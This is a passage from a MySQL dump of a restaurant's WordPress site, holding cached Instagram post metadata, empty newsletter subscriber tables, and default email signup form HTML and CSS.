mar\",\"profile_picture\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-19\\/s150x150\\/82381510_191985471870588_1184013790769840128_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=p7yAICSNt5IAX80DhFk&oh=7ae69ec80ae74246670db568da2573f8&oe=5F0F6689\",\"username\":\"solymar.riccione\"},\"images\":{\"thumbnail\":{\"width\":150,\"height\":150,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/c0.81.1440.1440a\\/s150x150\\/103392194_576424816626610_8868211552647610563_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=eG76mO5c-HIAX8f0Ezn&oh=1eff3ecb7c6014e84848af2c795542fa&oe=5F0F7ED9\"},\"low_resolution\":{\"width\":320,\"height\":356,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/p320x320\\/103392194_576424816626610_8868211552647610563_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=eG76mO5c-HIAX8f0Ezn&oh=a6a5f2ce67ebdd9215acafcd3d8096ef&oe=5F0FAFBE\"},\"standard_resolution\":{\"width\":640,\"height\":712,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/sh0.08\\/e35\\/p640x640\\/103392194_576424816626610_8868211552647610563_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=eG76mO5c-HIAX8f0Ezn&oh=5de8c212a465070a63eed804e166db7b&oe=5F0FA4C1\"}},\"created_time\":\"1592133124\",\"caption\":null,\"user_has_liked\":false,\"likes\":{\"count\":38},\"tags\":[],\"filter\":\"Normal\",\"comments\":{\"count\":0},\"type\":\"image\",\"link\":\"https:\\/\\/www.instagram.com\\/p\\/CBadLR_FkvA\\/\",\"location\":{\"latitude\":44.024605137663,\"longitude\":12.631787202682,\"name\":\"Ristorante Sol y Mar - Riccione\",\"id\":872660847},\"attribution\":null,\"users_in_photo\":[]}','error','a:1:{s:3:\"low\";i:320;}',1.00,1,'2021-01-20'),(34,'2020-06-14 13:34:05','2329188535738268267_8526810189','2020-06-14 13:34:05',NULL,'{\"id\":\"2329188535738268267_8526810189\",\"user\":{\"id\":\"8526810189\",\"full_name\":\"Ristorante sol y mar\",\"profile_picture\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-19\\/s150x150\\/82381510_191985471870588_1184013790769840128_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=p7yAICSNt5IAX80DhFk&oh=7ae69ec80ae74246670db568da2573f8&oe=5F0F6689\",\"username\":\"solymar.riccione\"},\"images\":{\"thumbnail\":{\"width\":150,\"height\":150,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/c163.0.1114.1114a\\/s150x150\\/103870277_829322207591661_5439615597850293438_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=NiwIG14_JbYAX91bXGp&oh=a35e019b844d24f237613fba81e2ffc0&oe=5F10AD9B\"},\"low_resolution\":{\"width\":320,\"height\":247,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s320x320\\/103870277_829322207591661_5439615597850293438_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=NiwIG14_JbYAX91bXGp&oh=be032d8af125d9e9840e28326ce5fbe3&oe=5F0F7433\"},\"standard_resolution\":{\"width\":640,\"height\":495,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/sh0.08\\/e35\\/s640x640\\/103870277_829322207591661_5439615597850293438_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=NiwIG14_JbYAX91bXGp&oh=4e19819cccc4dea0116e8ec8973a40e3&oe=5F0E0CD0\"}},\"created_time\":\"1591880932\",\"caption\":{\"id\":\"17891914873536437\",\"text\":\"Concentrati sull \'orizzonte\",\"created_time\":\"1591880932\",\"from\":{\"id\":\"8526810189\",\"full_name\":\"Ristorante sol y mar\",\"profile_picture\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-19\\/s150x150\\/82381510_191985471870588_1184013790769840128_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=p7yAICSNt5IAX80DhFk&oh=7ae69ec80ae74246670db568da2573f8&oe=5F0F6689\",\"username\":\"solymar.riccione\"}},\"user_has_liked\":false,\"likes\":{\"count\":70},\"tags\":[],\"filter\":\"Normal\",\"comments\":{\"count\":0},\"type\":\"image\",\"link\":\"https:\\/\\/www.instagram.com\\/p\\/CBS8KH3l3pr\\/\",\"location\":null,\"attribution\":null,\"users_in_photo\":[]}','error','a:1:{s:3:\"low\";i:320;}',1.00,1,'2021-01-20'),(35,'2020-06-14 13:34:05','2328534462265461699_8526810189','2020-06-14 13:32:05',NULL,'{\"id\":\"2328534462265461699_8526810189\",\"user\":{\"id\":\"8526810189\",\"full_name\":\"Ristorante sol y mar\",\"profile_picture\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-19\\/s150x150\\/82381510_191985471870588_1184013790769840128_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=p7yAICSNt5IAX80DhFk&oh=7ae69ec80ae74246670db568da2573f8&oe=5F0F6689\",\"username\":\"solymar.riccione\"},\"images\":{\"thumbnail\":{\"width\":150,\"height\":150,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/c0.117.1440.1440a\\/s150x150\\/103288594_253138372615644_3827700049515206364_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=MEljmQEC6n8AX8gCSAL&oh=2bc73de4bc853ad09be6e28442f6932d&oe=5F0F0CB5\"},\"low_resolution\":{\"width\":320,\"height\":372,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/p320x320\\/103288594_253138372615644_3827700049515206364_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=MEljmQEC6n8AX8gCSAL&oh=fcc8442e7748137566d116e7d09e48fa&oe=5F118A77\"},\"standard_resolution\":{\"width\":640,\"height\":744,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/sh0.08\\/e35\\/p640x640\\/103288594_253138372615644_3827700049515206364_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=MEljmQEC6n8AX8gCSAL&oh=c8511db1daaac55e1aeb3ce08503ceea&oe=5F0F9B0C\"}},\"created_time\":\"1591802960\",\"caption\":{\"id\":\"17947543771353668\",\"text\":\"Tav 12\",\"created_time\":\"1591802960\",\"from\":{\"id\":\"8526810189\",\"full_name\":\"Ristorante sol y mar\",\"profile_picture\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-19\\/s150x150\\/82381510_191985471870588_1184013790769840128_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=p7yAICSNt5IAX80DhFk&oh=7ae69ec80ae74246670db568da2573f8&oe=5F0F6689\",\"username\":\"solymar.riccione\"}},\"user_has_liked\":false,\"likes\":{\"count\":37},\"tags\":[],\"filter\":\"Normal\",\"comments\":{\"count\":0},\"type\":\"image\",\"link\":\"https:\\/\\/www.instagram.com\\/p\\/CBQncGelovD\\/\",\"location\":null,\"attribution\":null,\"users_in_photo\":[]}','error','a:1:{s:3:\"low\";i:320;}',1.00,1,'2021-01-20'),(36,'2020-06-14 13:34:05','2328534292345873726_8526810189','2020-06-14 13:30:05',NULL,'{\"id\":\"2328534292345873726_8526810189\",\"user\":{\"id\":\"8526810189\",\"full_name\":\"Ristorante sol y mar\",\"profile_picture\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-19\\/s150x150\\/82381510_191985471870588_1184013790769840128_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=p7yAICSNt5IAX80DhFk&oh=7ae69ec80ae74246670db568da2573f8&oe=5F0F6689\",\"username\":\"solymar.riccione\"},\"images\":{\"thumbnail\":{\"width\":150,\"height\":150,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s150x150\\/102981591_269758334378079_3426054715316521661_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=vGuHkv2fjhYAX-fI1jE&oh=83f05c5b6449474a5ce09234ec9c6d73&oe=5F10F443\"},\"low_resolution\":{\"width\":320,\"height\":320,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s320x320\\/102981591_269758334378079_3426054715316521661_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=vGuHkv2fjhYAX-fI1jE&oh=ff269dcb22d919f45153933e07bf2f1c&oe=5F113C3B\"},\"standard_resolution\":{\"width\":640,\"height\":640,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/sh0.08\\/e35\\/s640x640\\/102981591_269758334378079_3426054715316521661_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=vGuHkv2fjhYAX-fI1jE&oh=5792c5395cc211f950ad685989d33a7d&oe=5F0E08C8\"}},\"created_time\":\"1591802940\",\"caption\":{\"id\":\"18108001351190265\",\"text\":\"Tav 18\",\"created_time\":\"1591802940\",\"from\":{\"id\":\"8526810189\",\"full_name\":\"Ristorante sol y mar\",\"profile_picture\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-19\\/s150x150\\/82381510_191985471870588_1184013790769840128_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=p7yAICSNt5IAX80DhFk&oh=7ae69ec80ae74246670db568da2573f8&oe=5F0F6689\",\"username\":\"solymar.riccione\"}},\"user_has_liked\":false,\"likes\":{\"count\":56},\"tags\":[],\"filter\":\"Normal\",\"comments\":{\"count\":0},\"type\":\"image\",\"link\":\"https:\\/\\/www.instagram.com\\/p\\/CBQnZoOl2U-\\/\",\"location\":null,\"attribution\":null,\"users_in_photo\":[]}','error','a:1:{s:3:\"low\";i:320;}',1.00,1,'2021-01-20'),(37,'2020-06-14 13:34:06','2327826998113013615_8526810189','2020-06-14 13:28:05',NULL,'{\"id\":\"2327826998113013615_8526810189\",\"user\":{\"id\":\"8526810189\",\"full_name\":\"Ristorante sol y mar\",\"profile_picture\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-19\\/s150x150\\/82381510_191985471870588_1184013790769840128_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=p7yAICSNt5IAX80DhFk&oh=7ae69ec80ae74246670db568da2573f8&oe=5F0F6689\",\"username\":\"solymar.riccione\"},\"images\":{\"thumbnail\":{\"width\":150,\"height\":150,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/c0.180.1440.1440a\\/s150x150\\/102994860_621764482025391_2138796071144203071_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=GEehbR9e-xoAX_FcEue&oh=07ffc3f30f8b9dfb6cec2ddedb05e28e&oe=5F0FE109\"},\"low_resolution\":{\"width\":320,\"height\":400,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/p320x320\\/102994860_621764482025391_2138796071144203071_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=GEehbR9e-xoAX_FcEue&oh=272e4037bba4e6dad29aee2b2fa61eb3&oe=5F0E12A5\"},\"standard_resolution\":{\"width\":640,\"height\":800,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/sh0.08\\/e35\\/p640x640\\/102994860_621764482025391_2138796071144203071_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=GEehbR9e-xoAX_FcEue&oh=25fe54aa935734596cefe5dfebf29003&oe=5F105BDA\"}},\"created_time\":\"1591718624\",\"caption\":null,\"user_has_liked\":false,\"likes\":{\"count\":123},\"tags\":[],\"filter\":\"Normal\",\"comments\":{\"count\":3},\"type\":\"image\",\"link\":\"https:\\/\\/www.instagram.com\\/p\\/CBOGlJJFw9v\\/\",\"location\":null,\"attribution\":null,\"users_in_photo\":[]}','error','a:1:{s:3:\"low\";i:320;}',1.00,1,'2021-01-20'),(38,'2020-06-14 13:34:06','2327044284497580511_8526810189','2020-06-14 13:26:05',NULL,'{\"id\":\"2327044284497580511_8526810189\",\"user\":{\"id\":\"8526810189\",\"full_name\":\"Ristorante sol y mar\",\"profile_picture\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-19\\/s150x150\\/82381510_191985471870588_1184013790769840128_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=p7yAICSNt5IAX80DhFk&oh=7ae69ec80ae74246670db568da2573f8&oe=5F0F6689\",\"username\":\"solymar.riccione\"},\"images\":{\"thumbnail\":{\"width\":150,\"height\":150,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s150x150\\/102416333_141889817479029_6102984844095412450_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=zR5cpp3OqmMAX-5jjSA&oh=c12a8fc54207c4d1bf5c2db5612d1958&oe=5EE8485F\"},\"low_resolution\":{\"width\":320,\"height\":320,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s320x320\\/102416333_141889817479029_6102984844095412450_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=zR5cpp3OqmMAX-5jjSA&oh=1c33ccefbff5b0015dc6b99171d895d7&oe=5EE82827\"},\"standard_resolution\":{\"width\":480,\"height\":480,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/102416333_141889817479029_6102984844095412450_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=zR5cpp3OqmMAX-5jjSA&oh=66ce80c35affd588f96a31e4a6e38f09&oe=5EE871A2\"}},\"created_time\":\"1591625384\",\"caption\":{\"id\":\"17925666115395897\",\"text\":\"Less is More .Solymar\",\"created_time\":\"1591625384\",\"from\":{\"id\":\"8526810189\",\"full_name\":\"Ristorante sol y mar\",\"profile_picture\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-19\\/s150x150\\/82381510_191985471870588_1184013790769840128_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=p7yAICSNt5IAX80DhFk&oh=7ae69ec80ae74246670db568da2573f8&oe=5F0F6689\",\"username\":\"solymar.riccione\"}},\"user_has_liked\":false,\"likes\":{\"count\":92},\"tags\":[],\"filter\":\"Normal\",\"comments\":{\"count\":3},\"type\":\"video\",\"link\":\"https:\\/\\/www.instagram.com\\/p\\/CBLUnKSFNHf\\/\",\"location\":null,\"attribution\":null,\"users_in_photo\":[],\"videos\":{\"standard_resolution\":{\"width\":480,\"height\":480,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t50.2886-16\\/103531602_136425238051138_7846324595807174598_n.mp4?_nc_ht=scontent.cdninstagram.com&_nc_ohc=c-BwaeDt0FEAX8JNOKE&oe=5EE85B8D&oh=b65dce15b5f252f58056cdb83272b5b7\",\"id\":\"18119850793104172\"},\"low_resolution\":{\"width\":320,\"height\":320,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t50.2886-16\\/102436650_542576796421786_5552011350957453505_n.mp4?_nc_ht=scontent.cdninstagram.com&_nc_ohc=5-V3raol_DMAX_EScOs&oe=5EE883B6&oh=5a46508603c6b78431ee961c45fd8198\",\"id\":\"18119850790104172\"},\"low_bandwidth\":{\"width\":320,\"height\":320,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t50.2886-16\\/102436650_542576796421786_5552011350957453505_n.mp4?_nc_ht=scontent.cdninstagram.com&_nc_ohc=5-V3raol_DMAX_EScOs&oe=5EE883B6&oh=5a46508603c6b78431ee961c45fd8198\",\"id\":\"18119850790104172\"}},\"video_views\":450}','error','a:1:{s:3:\"low\";i:320;}',1.00,1,'2021-01-20'),(39,'2020-06-14 13:34:06','2326539661751880589_8526810189','2020-06-14 13:24:05',NULL,'{\"id\":\"2326539661751880589_8526810189\",\"user\":{\"id\":\"8526810189\",\"full_name\":\"Ristorante sol y mar\",\"profile_picture\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-19\\/s150x150\\/82381510_191985471870588_1184013790769840128_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=p7yAICSNt5IAX80DhFk&oh=7ae69ec80ae74246670db568da2573f8&oe=5F0F6689\",\"username\":\"solymar.riccione\"},\"images\":{\"thumbnail\":{\"width\":150,\"height\":150,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s150x150\\/102728174_258565338579374_2450646439448240076_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=A_3WA-EVO9cAX92dKIX&oh=aabb5eb4fcf448dede3fd9cfd6aab5fa&oe=5F0F03C2\"},\"low_resolution\":{\"width\":320,\"height\":320,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s320x320\\/102728174_258565338579374_2450646439448240076_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=A_3WA-EVO9cAX92dKIX&oh=127f60406b7910b3ebb9799de7fcaf04&oe=5F10573A\"},\"standard_resolution\":{\"width\":640,\"height\":640,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/sh0.08\\/e35\\/s640x640\\/102728174_258565338579374_2450646439448240076_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=A_3WA-EVO9cAX92dKIX&oh=dcbccc229f9be1fb3d11d3aee10cad55&oe=5F0F2245\"}},\"created_time\":\"1591565161\",\"caption\":{\"id\":\"17942015542364055\",\"text\":\"Il mio sole tramonta per rinascere (R.Browing)\",\"created_time\":\"1591565161\",\"from\":{\"id\":\"8526810189\",\"full_name\":\"Ristorante sol y mar\",\"profile_picture\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-19\\/s150x150\\/82381510_191985471870588_1184013790769840128_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=p7yAICSNt5IAX80DhFk&oh=7ae69ec80ae74246670db568da2573f8&oe=5F0F6689\",\"username\":\"solymar.riccione\"}},\"user_has_liked\":false,\"likes\":{\"count\":93},\"tags\":[],\"filter\":\"Normal\",\"comments\":{\"count\":0},\"type\":\"image\",\"link\":\"https:\\/\\/www.instagram.com\\/p\\/CBJh37ulAuN\\/\",\"location\":null,\"attribution\":null,\"users_in_photo\":[]}','error','a:1:{s:3:\"low\";i:320;}',1.00,1,'2021-01-20'),(40,'2020-06-14 13:34:06','2318348012471357907_8526810189','2020-06-14 13:22:05',NULL,'{\"id\":\"2318348012471357907_8526810189\",\"user\":{\"id\":\"8526810189\",\"full_name\":\"Ristorante sol y mar\",\"profile_picture\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-19\\/s150x150\\/82381510_191985471870588_1184013790769840128_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=p7yAICSNt5IAX80DhFk&oh=7ae69ec80ae74246670db568da2573f8&oe=5F0F6689\",\"username\":\"solymar.riccione\"},\"images\":{\"thumbnail\":{\"width\":150,\"height\":150,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s150x150\\/100964466_255900348965794_5812320385168193488_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=NF07wBxu4iQAX-XkKhc&oh=537804749bcc4d46730e7d9b0cec96b2&oe=5F116F26\"},\"low_resolution\":{\"width\":320,\"height\":320,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s320x320\\/100964466_255900348965794_5812320385168193488_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=NF07wBxu4iQAX-XkKhc&oh=782f1e46b74cbbc5abbbdd4331ce4c41&oe=5F0DCCDE\"},\"standard_resolution\":{\"width\":640,\"height\":640,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/sh0.08\\/e35\\/s640x640\\/100964466_255900348965794_5812320385168193488_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=NF07wBxu4iQAX-XkKhc&oh=ca2979cee4a2721a31cf3b3609d986a6&oe=5F0F1DA1\"}},\"created_time\":\"1590588641\",\"caption\":{\"id\":\"18024549454300202\",\"text\":\"Stiamo iniziando a vedere la Luce oltre il tunnel ,sabato vi diremo  la data di apertura\",\"created_time\":\"1590588641\",\"from\":{\"id\":\"8526810189\",\"full_name\":\"Ristorante sol y mar\",\"profile_picture\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-19\\/s150x150\\/82381510_191985471870588_1184013790769840128_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=p7yAICSNt5IAX80DhFk&oh=7ae69ec80ae74246670db568da2573f8&oe=5F0F6689\",\"username\":\"solymar.riccione\"}},\"user_has_liked\":false,\"likes\":{\"count\":46},\"tags\":[],\"filter\":\"Normal\",\"comments\":{\"count\":2},\"type\":\"image\",\"link\":\"https:\\/\\/www.instagram.com\\/p\\/CAsbTv1FpHT\\/\",\"location\":null,\"attribution\":null,\"users_in_photo\":[]}','error','a:1:{s:3:\"low\";i:320;}',1.00,1,'2021-01-20');
/*!40000 ALTER TABLE `wp_sbi_instagram_posts` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_sgpb_subscribers`
--

DROP TABLE IF EXISTS `wp_sgpb_subscribers`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_sgpb_subscribers` (
  `id` int(12) NOT NULL AUTO_INCREMENT,
  `firstName` varchar(255) DEFAULT NULL,
  `lastName` varchar(255) DEFAULT NULL,
  `email` varchar(255) DEFAULT NULL,
  `subscriptionType` int(12) DEFAULT NULL,
  `cDate` date DEFAULT NULL,
  `status` varchar(255) DEFAULT NULL,
  `unsubscribed` int(11) DEFAULT '0',
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_sgpb_subscribers`
--

LOCK TABLES `wp_sgpb_subscribers` WRITE;
/*!40000 ALTER TABLE `wp_sgpb_subscribers` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_sgpb_subscribers` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_sgpb_subscription_error_log`
--

DROP TABLE IF EXISTS `wp_sgpb_subscription_error_log`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_sgpb_subscription_error_log` (
  `id` int(12) NOT NULL AUTO_INCREMENT,
  `firstName` varchar(255) DEFAULT NULL,
  `popupType` varchar(255) DEFAULT NULL,
  `email` varchar(255) DEFAULT NULL,
  `date` varchar(255) DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_sgpb_subscription_error_log`
--

LOCK TABLES `wp_sgpb_subscription_error_log` WRITE;
/*!40000 ALTER TABLE `wp_sgpb_subscription_error_log` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_sgpb_subscription_error_log` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_sib_model_forms`
--

DROP TABLE IF EXISTS `wp_sib_model_forms`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_sib_model_forms` (
  `id` int(20) NOT NULL AUTO_INCREMENT,
  `title` varchar(120) CHARACTER SET utf8 COLLATE utf8_unicode_ci DEFAULT NULL,
  `html` longtext CHARACTER SET utf8 COLLATE utf8_unicode_ci,
  `css` longtext,
  `dependTheme` int(1) NOT NULL DEFAULT '1',
  `listID` longtext,
  `templateID` int(20) NOT NULL DEFAULT '-1',
  `isDopt` int(1) NOT NULL DEFAULT '0',
  `isOpt` int(1) NOT NULL DEFAULT '0',
  `redirectInEmail` varchar(255) DEFAULT NULL,
  `redirectInForm` varchar(255) DEFAULT NULL,
  `successMsg` varchar(255) CHARACTER SET utf8 COLLATE utf8_unicode_ci DEFAULT NULL,
  `errorMsg` varchar(255) CHARACTER SET utf8 COLLATE utf8_unicode_ci DEFAULT NULL,
  `existMsg` varchar(255) CHARACTER SET utf8 COLLATE utf8_unicode_ci DEFAULT NULL,
  `invalidMsg` varchar(255) CHARACTER SET utf8 COLLATE utf8_unicode_ci DEFAULT NULL,
  `attributes` varchar(255) CHARACTER SET utf8 COLLATE utf8_unicode_ci DEFAULT NULL,
  `date` date NOT NULL,
  `isDefault` int(1) NOT NULL DEFAULT '0',
  `gCaptcha` int(1) NOT NULL DEFAULT '0',
  `gCaptcha_secret` varchar(255) CHARACTER SET utf8 COLLATE utf8_unicode_ci DEFAULT NULL,
  `gCaptcha_site` varchar(255) CHARACTER SET utf8 COLLATE utf8_unicode_ci DEFAULT NULL,
  `termAccept` int(1) NOT NULL DEFAULT '1',
  `termsURL` varchar(255) CHARACTER SET utf8 COLLATE utf8_unicode_ci DEFAULT NULL,
  `confirmID` int(20) NOT NULL DEFAULT '-1',
  `requiredMsg` varchar(255) CHARACTER SET utf8 COLLATE utf8_unicode_ci DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=3 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_sib_model_forms`
--

LOCK TABLES `wp_sib_model_forms` WRITE;
/*!40000 ALTER TABLE `wp_sib_model_forms` DISABLE KEYS */;
INSERT INTO `wp_sib_model_forms` VALUES (1,'Default Form','<p class=\"sib-email-area\">\r\n    <label class=\"sib-email-area\">Indirizzo Email*</label>\r\n<br />\r\n    <input type=\"email\" class=\"sib-email-area\" name=\"email\" required=\"required\">\r\n</p>\r\n<p class=\"sib-NAME-area\">\r\n    <label class=\"sib-NAME-area\">Nome</label>\r\n<br />\r\n    <input type=\"text\" class=\"sib-NAME-area\" name=\"NAME\" >\r\n</p>\r\n<p>\r\n    <input type=\"submit\" class=\"sib-default-btn\" value=\"Iscriviti\">\r\n</p>','[form] {\r\n    padding: 5px;\r\n    -moz-box-sizing:border-box;\r\n    -webkit-box-sizing: border-box;\r\n    box-sizing: border-box;\r\n}\r\n[form] input[type=text],[form] input[type=email], [form] select {\r\n    width: 100%;\r\n    border: 1px solid #bbb;\r\n    height: auto;\r\n    margin: 5px 0 0 0;\r\n}\r\n[form] .sib-default-btn {\r\n    margin: 5px 0;\r\n    padding: 6px 12px;\r\n    color:#fff;\r\n    background-color: #333;\r\n    border-color: #2E2E2E;\r\n    font-size: 14px;\r\n    font-weight:400;\r\n    line-height: 1.4285;\r\n    text-align: center;\r\n    cursor: pointer;\r\n    vertical-align: middle;\r\n    -webkit-user-select:none;\r\n    -moz-user-select:none;\r\n    -ms-user-select:none;\r\n    user-select:none;\r\n    white-space: normal;\r\n    border:1px solid transparent;\r\n    border-radius: 3px;\r\n}\r\n[form] .sib-default-btn:hover {\r\n    background-color: #444;\r\n}\r\n[form] p{\r\n    margin: 10px 0 0 0;\r\n}',1,'a:1:{i:0;s:1:\"2\";}',-1,0,0,'','','Thank you, you have successfully registered !','Something wrong occured','You have already registered','Your email address is invalid','email','2016-11-25',1,0,NULL,NULL,1,NULL,-1,NULL),(2,'Old Form','<p class=\"sib-email-area\">\r\n    <label class=\"sib-email-area\">Email Address</label>\r\n    <input type=\"email\" class=\"sib-email-area\" name=\"email\" required=\"required\">\r\n</p>\r\n<p class=\"sib-NAME-area\">\r\n    <label class=\"sib-NAME-area\">Name</label>\r\n    <input type=\"text\" class=\"sib-NAME-area\" name=\"NAME\" >\r\n</p>\r\n<p>\r\n    <input type=\"submit\" class=\"sib-default-btn\" value=\"Subscribe\">\r\n</p>','',1,'a:1:{i:0;s:1:\"2\";}',-1,0,1,'','','Thank you, you have successfully registered !','Something wrong occured','You have already registered','Your email address is invalid','email,NAME','2016-11-03',0,0,NULL,NULL,1,NULL,-1,NULL);
/*!40000 ALTER TABLE `wp_sib_model_forms` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_sib_model_users`
--

DROP TABLE IF EXISTS `wp_sib_model_users`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_sib_model_users` (
  `id` int(20) NOT NULL AUTO_INCREMENT,
  `email` varchar(255) DEFAULT NULL,
  `code` varchar(100) DEFAULT NULL,
  `listIDs` longtext,
  `redirectUrl` varchar(255) DEFAULT NULL,
  `info` text CHARACTER SET utf8 COLLATE utf8_unicode_ci,
  `frmid` int(2) DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_sib_model_users`
--

LOCK TABLES `wp_sib_model_users` WRITE;
/*!40000 ALTER TABLE `wp_sib_model_users` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_sib_model_users` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_term_relationships`
--

DROP TABLE IF EXISTS `wp_term_relationships`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_term_relationships` (
  `object_id` bigint(20) unsigned NOT NULL DEFAULT '0',
